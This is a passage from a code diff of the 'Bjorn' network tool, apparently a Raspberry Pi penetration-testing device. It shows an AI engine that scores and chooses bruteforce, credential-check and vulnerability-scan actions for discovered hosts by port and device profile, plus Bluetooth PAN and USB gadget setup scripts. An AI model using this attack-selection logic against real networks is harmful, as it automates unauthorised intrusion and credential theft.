'mysql': ['MySQLBruteforce'],
'postgres': ['PostgresBruteforce']
},
'profile_based': {
'camera': ['WebEnumeration', 'DefaultCredCheck', 'RTSPBruteforce'],
'nas': ['SMBBruteforce', 'WebEnumeration', 'SSHBruteforce'],
'web_server': ['WebEnumeration', 'WebVulnScan'],
'database': ['MySQLBruteforce', 'PostgresBruteforce'],
'linux_server': ['SSHBruteforce', 'WebEnumeration'],
'windows_server': ['SMBBruteforce', 'RDPBruteforce']
}
}
def _predict_with_heuristics(
self,
host_context: Dict[str, Any],
available_actions: List[str]
) -> Tuple[str, float, Dict[str, Any]]:
"""
Use rule-based heuristics for action selection.
Provides decent performance without machine learning.
"""
try:
mac = host_context.get('mac', '')
host = self.db.get_host_by_mac(mac) if mac else {}
# Get ports and services
ports_str = host.get('ports', '') or ''
ports = {int(p) for p in ports_str.split(';') if p.strip().isdigit()}
services = self._get_services_for_host(mac)
# Detect port profile
port_profile = self._detect_port_profile(ports)
# Scoring system
action_scores = {action: 0.0 for action in available_actions}
# Score based on ports
for port in ports:
if port in self.heuristics['port_based']:
for action in self.heuristics['port_based'][port]:
if action in action_scores:
action_scores[action] += 0.3
# Score based on services
for service in services:
if service in self.heuristics['service_based']:
for action in self.heuristics['service_based'][service]:
if action in action_scores:
action_scores[action] += 0.4
# Score based on port profile
if port_profile in self.heuristics['profile_based']:
for action in self.heuristics['profile_based'][port_profile]:
if action in action_scores:
action_scores[action] += 0.3
# Find best action
if action_scores:
best_action = max(action_scores, key=action_scores.get)
best_score = action_scores[best_action]
# Normalize score to 0-1
if best_score > 0:
best_score = min(best_score / 1.0, 1.0)
debug_info = {
'method': 'heuristics',
'port_profile': port_profile,
'ports': list(ports)[:10],
'services': services,
'all_scores': {k: v for k, v in action_scores.items() if v > 0}
}
return best_action, best_score, debug_info
# Ultimate fallback
if available_actions:
return available_actions[0], 0.1, {'method': 'fallback_first'}
return None, 0.0, {'method': 'no_actions'}
except Exception as e:
logger.error(f"Heuristic prediction failed: {e}")
if available_actions:
return available_actions[0], 0.0, {'method': 'fallback_error', 'error': str(e)}
return None, 0.0, {'method': 'error', 'error': str(e)}
# ═══════════════════════════════════════════════════════════════════════
# HELPER METHODS
# ═══════════════════════════════════════════════════════════════════════
@staticmethod
def _relu(x):
"""ReLU activation function"""
return np.maximum(0, x)
@staticmethod
def _sigmoid(x):
"""Sigmoid activation function"""
return 1.0 / (1.0 + np.exp(-x))
@staticmethod
def _softmax(x):
"""Softmax activation function"""
exp_x = np.exp(x - np.max(x)) # Numerical stability
return exp_x / exp_x.sum()
def _forward_network(self, input_vector: np.ndarray) -> np.ndarray:
"""
Forward pass through exported dense network with dynamic hidden depth.
Expected keys: w1/b1, w2/b2, ..., w_out/b_out
"""
a = input_vector
layer_idx = 1
while f'w{layer_idx}' in self.model_weights:
w = self.model_weights[f'w{layer_idx}']
b = self.model_weights[f'b{layer_idx}']
a = self._relu(np.dot(a, w) + b)
layer_idx += 1
return np.dot(a, self.model_weights['w_out']) + self.model_weights['b_out']
def _get_services_for_host(self, mac: str) -> List[str]:
"""Get detected services for host"""
try:
results = self.db.query("""
SELECT DISTINCT service
FROM port_services
WHERE mac_address=?
""", (mac,))
return [r['service'] for r in results if r.get('service')]
except:
return []
def _get_credentials_for_host(self, mac: str) -> List[Dict]:
"""Get credentials found for host"""
try:
return self.db.query("""
SELECT service, user, port
FROM creds
WHERE mac_address=?
""", (mac,))
except:
return []
def _categorize_vendor(self, vendor: str) -> str:
"""Categorize vendor (same as feature_logger)"""
if not vendor:
return 'unknown'
vendor_lower = vendor.lower()
categories = {
'networking': ['cisco', 'juniper', 'ubiquiti', 'mikrotik', 'tp-link'],
'iot': ['hikvision', 'dahua', 'axis'],
'nas': ['synology', 'qnap'],
'compute': ['raspberry', 'intel', 'apple', 'dell', 'hp'],
'virtualization': ['vmware', 'microsoft'],
'mobile': ['apple', 'samsung', 'huawei']
}
for category, vendors in categories.items():
if any(v in vendor_lower for v in vendors):
return category
return 'other'
def _detect_port_profile(self, ports) -> str:
"""Detect device profile from ports (same as feature_logger)"""
port_set = set(ports)
profiles = {
'camera': {554, 80, 8000},
'web_server': {80, 443, 8080},
'nas': {5000, 5001, 548, 139, 445},
'database': {3306, 5432, 1433, 27017},
'linux_server': {22, 80, 443},
'windows_server': {135, 139, 445, 3389},
'printer': {9100, 515, 631},
'router': {22, 23, 80, 443, 161}
}
max_overlap = 0
best_profile = 'generic'
for profile_name, profile_ports in profiles.items():
overlap = len(port_set & profile_ports)
if overlap > max_overlap:
max_overlap = overlap
best_profile = profile_name
return best_profile if max_overlap >= 2 else 'generic'
# ═══════════════════════════════════════════════════════════════════════
# STATISTICS
# ═══════════════════════════════════════════════════════════════════════
def get_stats(self) -> Dict[str, Any]:
"""Get AI engine statistics"""
stats = {
'model_loaded': self.model_loaded,
'heuristics_available': True,
'decision_mode': 'neural_network' if self.model_loaded else 'heuristics'
}
if self.model_loaded and self.model_config:
stats.update({
'model_version': self.model_config.get('version'),
'model_trained_at': self.model_config.get('trained_at'),
'model_accuracy': self.model_config.get('accuracy'),
'training_samples': self.model_config.get('training_samples')
})
return stats
# ═══════════════════════════════════════════════════════════════════════════
# SINGLETON FACTORY
# ═══════════════════════════════════════════════════════════════════════════
def get_or_create_ai_engine(shared_data) -> Optional['BjornAIEngine']:
"""
Return the single BjornAIEngine instance attached to shared_data.
Creates it on first call; subsequent calls return the cached instance.
Use this instead of BjornAIEngine(shared_data) to avoid loading model
weights multiple times (orchestrator + scheduler + web each need AI).
"""
if getattr(shared_data, '_ai_engine_singleton', None) is None:
try:
shared_data._ai_engine_singleton = BjornAIEngine(shared_data)
except Exception as e:
logger.error(f"Failed to create BjornAIEngine singleton: {e}")
shared_data._ai_engine_singleton = None
return shared_data._ai_engine_singleton
def invalidate_ai_engine(shared_data) -> None:
"""Drop the cached singleton (e.g. after a mode reset or model update)."""
shared_data._ai_engine_singleton = None
# ═══════════════════════════════════════════════════════════════════════════
# END OF FILE
# ═══════════════════════════════════════════════════════════════════════════

99
ai_utils.py Normal file
View File

@@ -0,0 +1,99 @@
"""
ai_utils.py - Shared AI utilities for Bjorn
"""
import json
import numpy as np
from typing import Dict, List, Any, Optional
def extract_neural_features_dict(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> Dict[str, float]:
"""
Extracts all available features as a named dictionary.
This allows the model to select exactly what it needs by name.
"""
f = {}
# 1. Host numericals
f['host_port_count'] = float(host_features.get('port_count', 0))
f['host_service_count'] = float(host_features.get('service_count', 0))
f['host_ip_count'] = float(host_features.get('ip_count', 0))
f['host_credential_count'] = float(host_features.get('credential_count', 0))
f['host_age_hours'] = float(host_features.get('age_hours', 0))
# 2. Host Booleans
f['has_ssh'] = 1.0 if host_features.get('has_ssh') else 0.0
f['has_http'] = 1.0 if host_features.get('has_http') else 0.0
f['has_https'] = 1.0 if host_features.get('has_https') else 0.0
f['has_smb'] = 1.0 if host_features.get('has_smb') else 0.0
f['has_rdp'] = 1.0 if host_features.get('has_rdp') else 0.0
f['has_database'] = 1.0 if host_features.get('has_database') else 0.0
f['has_credentials'] = 1.0 if host_features.get('has_credentials') else 0.0
f['is_new'] = 1.0 if host_features.get('is_new') else 0.0
f['is_private'] = 1.0 if host_features.get('is_private') else 0.0
f['has_multiple_ips'] = 1.0 if host_features.get('has_multiple_ips') else 0.0
# 3. Vendor Category (One-Hot)
vendor_cats = ['networking', 'iot', 'nas', 'compute', 'virtualization', 'mobile', 'other', 'unknown']
current_vendor = host_features.get('vendor_category', 'unknown')
for cat in vendor_cats:
f[f'vendor_is_{cat}'] = 1.0 if cat == current_vendor else 0.0
# 4. Port Profile (One-Hot)
port_profiles = ['camera', 'web_server', 'nas', 'database', 'linux_server',
'windows_server', 'printer', 'router', 'generic', 'unknown']
current_profile = host_features.get('port_profile', 'unknown')
for prof in port_profiles:
f[f'profile_is_{prof}'] = 1.0 if prof == current_profile else 0.0
# 5. Network Stats
f['net_total_hosts'] = float(network_features.get('total_hosts', 0))
f['net_subnet_count'] = float(network_features.get('subnet_count', 0))
f['net_similar_vendor_count'] = float(network_features.get('similar_vendor_count', 0))
f['net_similar_port_profile_count'] = float(network_features.get('similar_port_profile_count', 0))
f['net_active_host_ratio'] = float(network_features.get('active_host_ratio', 0.0))
# 6. Temporal features
f['time_hour'] = float(temporal_features.get('hour_of_day', 0))
f['time_day'] = float(temporal_features.get('day_of_week', 0))
f['is_weekend'] = 1.0 if temporal_features.get('is_weekend') else 0.0
f['is_night'] = 1.0 if temporal_features.get('is_night') else 0.0
f['hist_action_count'] = float(temporal_features.get('previous_action_count', 0))
f['hist_seconds_since_last'] = float(temporal_features.get('seconds_since_last', 0))
f['hist_success_rate'] = float(temporal_features.get('historical_success_rate', 0.0))
f['hist_same_attempts'] = float(temporal_features.get('same_action_attempts', 0))
f['is_retry'] = 1.0 if temporal_features.get('is_retry') else 0.0
f['global_success_rate'] = float(temporal_features.get('global_success_rate', 0.0))
f['hours_since_discovery'] = float(temporal_features.get('hours_since_discovery', 0))
# 7. Action Info
action_types = ['bruteforce', 'enumeration', 'exploitation', 'extraction', 'other']
current_type = action_features.get('action_type', 'other')
for atype in action_types:
f[f'action_is_{atype}'] = 1.0 if atype == current_type else 0.0
f['action_target_port'] = float(action_features.get('target_port', 0))
f['action_is_standard_port'] = 1.0 if action_features.get('is_standard_port') else 0.0
return f
def extract_neural_features(host_features: Dict[str, Any], network_features: Dict[str, Any], temporal_features: Dict[str, Any], action_features: Dict[str, Any]) -> List[float]:
"""
Deprecated: Hardcoded list. Use extract_neural_features_dict for evolution.
Kept for backward compatibility during transition.
"""
d = extract_neural_features_dict(host_features, network_features, temporal_features, action_features)
# Return as a list in a fixed order (the one previously used)
# This is fragile and will be replaced by manifest-based extraction.
return list(d.values())
def get_system_mac() -> str:
"""
Get the persistent MAC address of the device.
Used for unique identification in Swarm mode.
"""
try:
import uuid
mac = uuid.getnode()
return ':'.join(('%012X' % mac)[i:i+2] for i in range(0, 12, 2))
except:
return "00:00:00:00:00:00"

517
bjorn_bluetooth.sh Normal file
View File

@@ -0,0 +1,517 @@
#!/bin/bash
# bjorn_bluetooth_manager.sh
# Script to configure Bluetooth PAN for BJORN
# Usage: ./bjorn_bluetooth_manager.sh -f
# ./bjorn_bluetooth_manager.sh -u
# ./bjorn_bluetooth_manager.sh -l
# ./bjorn_bluetooth_manager.sh -h
# Author: Infinition
# Version: 1.1
# Description: This script configures and manages Bluetooth PAN for BJORN
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_manager_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
"CYAN") echo -e "${CYAN}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install Bluetooth PAN"
echo -e " ${BLUE}-u${NC} Uninstall Bluetooth PAN"
echo -e " ${BLUE}-l${NC} List Bluetooth PAN Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install Bluetooth PAN"
echo -e " $0 -u Uninstall Bluetooth PAN"
echo -e " $0 -l List Bluetooth PAN Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== Bluetooth PAN Configuration Procedure =====${NC}"
echo -e "To configure the Bluetooth PAN driver and set the IP address, subnet mask, and gateway for the PAN network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e " - DNS Servers: 8.8.8.8, 8.8.4.4"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the Bluetooth PAN, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart auto_bt_connect.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the PAN network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install Bluetooth PAN
# ============================================================
install_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Create settings directory
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
if [ ! -d "$SETTINGS_DIR" ]; then
mkdir -p "$SETTINGS_DIR"
check_success "Created settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR already exists. Skipping creation."
fi
# Create bt.json if it doesn't exist
BT_CONFIG="$SETTINGS_DIR/bt.json"
if [ ! -f "$BT_CONFIG" ]; then
log "INFO" "Creating Bluetooth configuration file at $BT_CONFIG"
cat << 'EOF' > "$BT_CONFIG"
{
"device_mac": "AA:BB:CC:DD:EE:FF" # Replace with your device's MAC address
}
EOF
check_success "Created Bluetooth configuration file at $BT_CONFIG"
log "WARNING" "Please edit $BT_CONFIG to include your Bluetooth device's MAC address."
else
log "INFO" "Bluetooth configuration file $BT_CONFIG already exists. Skipping creation."
fi
# Create auto_bt_connect.py
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
if [ ! -f "$BT_PY_SCRIPT" ]; then
log "INFO" "Creating Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
cat << 'EOF' > "$BT_PY_SCRIPT"
#!/usr/bin/env python3
import json
import subprocess
import time
import logging
import os
LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
logging.basicConfig(filename="/var/log/auto_bt_connect.log", level=logging.INFO, format=LOG_FORMAT)
logger = logging.getLogger("auto_bt_connect")
CONFIG_PATH = "/home/bjorn/.settings_bjorn/bt.json"
CHECK_INTERVAL = 30 # Interval in seconds between each check
def ensure_bluetooth_service():
try:
res = subprocess.run(["systemctl", "is-active", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if "active" not in res.stdout:
logger.info("Bluetooth service not active. Starting and enabling it...")
start_res = subprocess.run(["systemctl", "start", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if start_res.returncode != 0:
logger.error(f"Failed to start bluetooth service: {start_res.stderr}")
return False
enable_res = subprocess.run(["systemctl", "enable", "bluetooth"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if enable_res.returncode != 0:
logger.error(f"Failed to enable bluetooth service: {enable_res.stderr}")
# Not fatal, but log it.
else:
logger.info("Bluetooth service enabled successfully.")
else:
logger.info("Bluetooth service is already active.")
return True
except Exception as e:
logger.error(f"Error ensuring bluetooth service: {e}")
return False
def is_already_connected():
# Check if bnep0 interface is up with an IP
ip_res = subprocess.run(["ip", "addr", "show", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if ip_res.returncode == 0 and "inet " in ip_res.stdout:
# bnep0 interface exists and has an IPv4 address
logger.info("bnep0 is already up and has an IP. No action needed.")
return True
return False
def run_in_background(cmd):
# Run a command in background, return the process
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
return process
def establish_connection(device_mac):
# Attempt to run bt-network
logger.info(f"Attempting to connect PAN with device {device_mac}...")
bt_process = run_in_background(["bt-network", "-c", device_mac, "nap"])
# Wait a bit for PAN to set up
time.sleep(3)
# Check if bt-network exited prematurely
if bt_process.poll() is not None:
# Process ended
if bt_process.returncode != 0:
stderr_output = bt_process.stderr.read() if bt_process.stderr else ""
logger.error(f"bt-network failed: {stderr_output}")
return False
else:
logger.warning("bt-network ended immediately. PAN may not be established.")
return False
else:
logger.info("bt-network running in background...")
# Now run dhclient for IPv4
dh_res = subprocess.run(["dhclient", "-4", "bnep0"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True)
if dh_res.returncode != 0:
logger.error(f"dhclient failed: {dh_res.stderr}")
return False
logger.info("Successfully obtained IP on bnep0. PAN connection established.")
return True
def load_config():
if not os.path.exists(CONFIG_PATH):
logger.error(f"Config file {CONFIG_PATH} not found.")
return None
try:
with open(CONFIG_PATH, "r") as f:
config = json.load(f)
device_mac = config.get("device_mac")
if not device_mac:
logger.error("No device_mac found in config.")
return None
return device_mac
except Exception as e:
logger.error(f"Error loading config: {e}")
return None
def main():
device_mac = load_config()
if not device_mac:
return
while True:
try:
if not ensure_bluetooth_service():
logger.error("Bluetooth service setup failed.")
elif is_already_connected():
# Already connected and has IP, do nothing
pass
else:
# Attempt to establish connection
success = establish_connection(device_mac)
if not success:
logger.warning("Failed to establish PAN connection.")
except Exception as e:
logger.error(f"Unexpected error in main loop: {e}")
# Wait before the next check
time.sleep(CHECK_INTERVAL)
if __name__ == "__main__":
main()
EOF
check_success "Created Bluetooth auto-connect Python script at $BT_PY_SCRIPT"
else
log "INFO" "Bluetooth auto-connect Python script $BT_PY_SCRIPT already exists. Skipping creation."
fi
# Make the Python script executable
chmod +x "$BT_PY_SCRIPT"
check_success "Made Python script executable at $BT_PY_SCRIPT"
# Create the systemd service
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
if [ ! -f "$BT_SERVICE" ]; then
log "INFO" "Creating systemd service at $BT_SERVICE"
cat << 'EOF' > "$BT_SERVICE"
[Unit]
Description=Auto Bluetooth PAN Connect
After=network.target bluetooth.service
Wants=bluetooth.service
[Service]
Type=simple
ExecStart=/usr/local/bin/auto_bt_connect.py
Restart=on-failure
RestartSec=10
[Install]
WantedBy=multi-user.target
EOF
check_success "Created systemd service at $BT_SERVICE"
else
log "INFO" "Systemd service $BT_SERVICE already exists. Skipping creation."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
# Enable and start the service
systemctl enable auto_bt_connect.service
check_success "Enabled auto_bt_connect.service"
systemctl start auto_bt_connect.service
check_success "Started auto_bt_connect.service"
echo -e "${GREEN}Bluetooth PAN installation completed successfully. A reboot is required for changes to take effect.${NC}"
}
# ============================================================
# Function to Uninstall Bluetooth PAN
# ============================================================
uninstall_bluetooth_pan() {
log "INFO" "Starting Bluetooth PAN uninstallation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
SETTINGS_DIR="/home/bjorn/.settings_bjorn"
BT_CONFIG="$SETTINGS_DIR/bt.json"
# Stop and disable the service
if systemctl is-active --quiet auto_bt_connect.service; then
systemctl stop auto_bt_connect.service
check_success "Stopped auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not running."
fi
if systemctl is-enabled --quiet auto_bt_connect.service; then
systemctl disable auto_bt_connect.service
check_success "Disabled auto_bt_connect.service"
else
log "INFO" "auto_bt_connect.service is not enabled."
fi
# Remove the systemd service file
if [ -f "$BT_SERVICE" ]; then
rm "$BT_SERVICE"
check_success "Removed $BT_SERVICE"
else
log "INFO" "$BT_SERVICE does not exist. Skipping removal."
fi
# Remove the Python script
if [ -f "$BT_PY_SCRIPT" ]; then
rm "$BT_PY_SCRIPT"
check_success "Removed $BT_PY_SCRIPT"
else
log "INFO" "$BT_PY_SCRIPT does not exist. Skipping removal."
fi
# Remove Bluetooth configuration directory and file
if [ -d "$SETTINGS_DIR" ]; then
rm -rf "$SETTINGS_DIR"
check_success "Removed settings directory at $SETTINGS_DIR"
else
log "INFO" "Settings directory $SETTINGS_DIR does not exist. Skipping removal."
fi
# Reload systemd daemon
systemctl daemon-reload
check_success "Reloaded systemd daemon"
log "SUCCESS" "Bluetooth PAN uninstallation completed successfully."
}
# ============================================================
# Function to List Bluetooth PAN Information
# ============================================================
list_bluetooth_pan_info() {
echo -e "${CYAN}===== Bluetooth PAN Information =====${NC}"
BT_SERVICE="/etc/systemd/system/auto_bt_connect.service"
BT_PY_SCRIPT="/usr/local/bin/auto_bt_connect.py"
BT_CONFIG="/home/bjorn/.settings_bjorn/bt.json"
# Check status of auto_bt_connect.service
echo -e "\n${YELLOW}Service Status:${NC}"
if systemctl list-units --type=service | grep -q auto_bt_connect.service; then
systemctl status auto_bt_connect.service --no-pager
else
echo -e "${RED}auto_bt_connect.service is not installed.${NC}"
fi
# Check if Bluetooth auto-connect Python script exists
echo -e "\n${YELLOW}Bluetooth Auto-Connect Script:${NC}"
if [ -f "$BT_PY_SCRIPT" ]; then
echo -e "${GREEN}$BT_PY_SCRIPT exists.${NC}"
else
echo -e "${RED}$BT_PY_SCRIPT does not exist.${NC}"
fi
# Check Bluetooth configuration file
echo -e "\n${YELLOW}Bluetooth Configuration File:${NC}"
if [ -f "$BT_CONFIG" ]; then
echo -e "${GREEN}$BT_CONFIG exists.${NC}"
echo -e "${CYAN}Contents:${NC}"
cat "$BT_CONFIG"
else
echo -e "${RED}$BT_CONFIG does not exist.${NC}"
fi
echo -e "\n===== End of Information ====="
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Bluetooth PAN Manager Menu ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. Install Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Uninstall Bluetooth PAN ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. List Bluetooth PAN Information ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Show Help ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure you run this script as root."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-5): ${NC}"
read choice
case $choice in
1)
install_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
2)
uninstall_bluetooth_pan
echo ""
read -p "Press Enter to return to the menu..."
;;
3)
list_bluetooth_pan_info
echo ""
read -p "Press Enter to return to the menu..."
;;
4)
show_usage
;;
5)
log "INFO" "Exiting Bluetooth PAN Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-5."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts ":fulh" opt; do
case $opt in
f)
install_bluetooth_pan
exit 0
;;
u)
uninstall_bluetooth_pan
exit 0
;;
l)
list_bluetooth_pan_info
exit 0
;;
h)
show_usage
;;
\?)
echo -e "${RED}Invalid option: -$OPTARG${NC}" >&2
show_usage
;;
esac
done
# ============================================================
# Main Execution
# ============================================================
# If no arguments are provided, display the menu
if [ $OPTIND -eq 1 ]; then
display_main_menu
fi

567
bjorn_usb_gadget.sh Normal file
View File

@@ -0,0 +1,567 @@
#!/bin/bash
# bjorn_usb_gadget.sh
# Script to configure USB Gadget for BJORN
# Usage: ./bjorn_usb_gadget.sh -f
# ./bjorn_usb_gadget.sh -u
# ./bjorn_usb_gadget.sh -l
# ./bjorn_usb_gadget.sh -h
# Author: Infinition
# Version: 1.4
# Description: This script configures and manages USB Gadget for BJORN with duplicate prevention
# ============================================================
# Colors for Output
# ============================================================
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
NC='\033[0m' # No Color
# ============================================================
# Logging Configuration
# ============================================================
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_usb_gadget_$(date +%Y%m%d_%H%M%S).log"
# Ensure log directory exists
mkdir -p "$LOG_DIR"
# ============================================================
# Logging Function
# ============================================================
log() {
local level=$1
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
echo -e "$message" | tee -a "$LOG_FILE"
case $level in
"ERROR") echo -e "${RED}$message${NC}" ;;
"SUCCESS") echo -e "${GREEN}$message${NC}" ;;
"WARNING") echo -e "${YELLOW}$message${NC}" ;;
"INFO") echo -e "${BLUE}$message${NC}" ;;
*) echo -e "$message" ;;
esac
}
# ============================================================
# Error Handling
# ============================================================
handle_error() {
local error_message=$1
log "ERROR" "$error_message"
exit 1
}
# ============================================================
# Function to Check Command Success
# ============================================================
check_success() {
if [ $? -eq 0 ]; then
log "SUCCESS" "$1"
return 0
else
handle_error "$1"
return $?
fi
}
# ============================================================
# Function to Show Usage
# ============================================================
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-f${NC} Install USB Gadget"
echo -e " ${BLUE}-u${NC} Uninstall USB Gadget"
echo -e " ${BLUE}-l${NC} List USB Gadget Information"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Example:"
echo -e " $0 -f Install USB Gadget"
echo -e " $0 -u Uninstall USB Gadget"
echo -e " $0 -l List USB Gadget Information"
echo -e " $0 -h Show help"
echo -e ""
echo -e "${YELLOW}===== RNDIS Configuration Procedure =====${NC}"
echo -e "To configure the RNDIS driver and set the IP address, subnet mask, and gateway for the RNDIS network interface card, follow the steps below:"
echo -e ""
echo -e "1. **Configure IP Address on the Server (Pi):**"
echo -e " - The default IP address is set in the script as follows:"
echo -e " - IP: 172.20.2.1"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "2. **Configure IP Address on the Host Computer:**"
echo -e " - On your host computer (Windows, Linux, etc.), configure the RNDIS network interface to use an IP address in the same subnet. For example:"
echo -e " - IP: 172.20.2.2"
echo -e " - Subnet Mask: 255.255.255.0"
echo -e " - Gateway: 172.20.2.1"
echo -e ""
echo -e "3. **Restart the Service:**"
echo -e " - After installing the USB gadget, restart the service to apply the changes:"
echo -e " ```bash"
echo -e " sudo systemctl restart usb-gadget.service"
echo -e " ```"
echo -e ""
echo -e "4. **Verify the Connection:**"
echo -e " - Ensure that the RNDIS network interface is active on both devices."
echo -e " - Test connectivity by pinging the IP address of the other device."
echo -e " - From the Pi: \`ping 172.20.2.2\`"
echo -e " - From the host computer: \`ping 172.20.2.1\`"
echo -e ""
echo -e "===== End of Procedure =====${NC}"
exit 1
}
# ============================================================
# Function to Install USB Gadget with RNDIS
# ============================================================
install_usb_gadget() {
log "INFO" "Starting USB Gadget installation..."
# Ensure the script is run as root
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This script must be run as root. Please use 'sudo'."
exit 1
fi
# Backup cmdline.txt and config.txt if not already backed up
if [ ! -f /boot/firmware/cmdline.txt.bak ]; then
cp /boot/firmware/cmdline.txt /boot/firmware/cmdline.txt.bak
check_success "Backed up /boot/firmware/cmdline.txt to /boot/firmware/cmdline.txt.bak"
else
log "INFO" "/boot/firmware/cmdline.txt.bak already exists. Skipping backup."
fi
if [ ! -f /boot/firmware/config.txt.bak ]; then
cp /boot/firmware/config.txt /boot/firmware/config.txt.bak
check_success "Backed up /boot/firmware/config.txt to /boot/firmware/config.txt.bak"
else
log "INFO" "/boot/firmware/config.txt.bak already exists. Skipping backup."
fi
# Modify cmdline.txt: Remove existing modules-load entries related to dwc2
log "INFO" "Cleaning up existing modules-load entries in /boot/firmware/cmdline.txt"
sudo sed -i '/modules-load=dwc2,g_rndis/d' /boot/firmware/cmdline.txt
sudo sed -i '/modules-load=dwc2,g_ether/d' /boot/firmware/cmdline.txt
check_success "Removed duplicate modules-load entries from /boot/firmware/cmdline.txt"
# Add a single modules-load=dwc2,g_rndis if not present
if ! grep -q "modules-load=dwc2,g_rndis" /boot/firmware/cmdline.txt; then
sudo sed -i 's/rootwait/rootwait modules-load=dwc2,g_rndis/' /boot/firmware/cmdline.txt
check_success "Added modules-load=dwc2,g_rndis to /boot/firmware/cmdline.txt"
else
log "INFO" "modules-load=dwc2,g_rndis already present in /boot/firmware/cmdline.txt"
fi
# Add a single modules-load=dwc2,g_ether if not present
if ! grep -q "modules-load=dwc2,g_ether" /boot/firmware/cmdline.txt; then
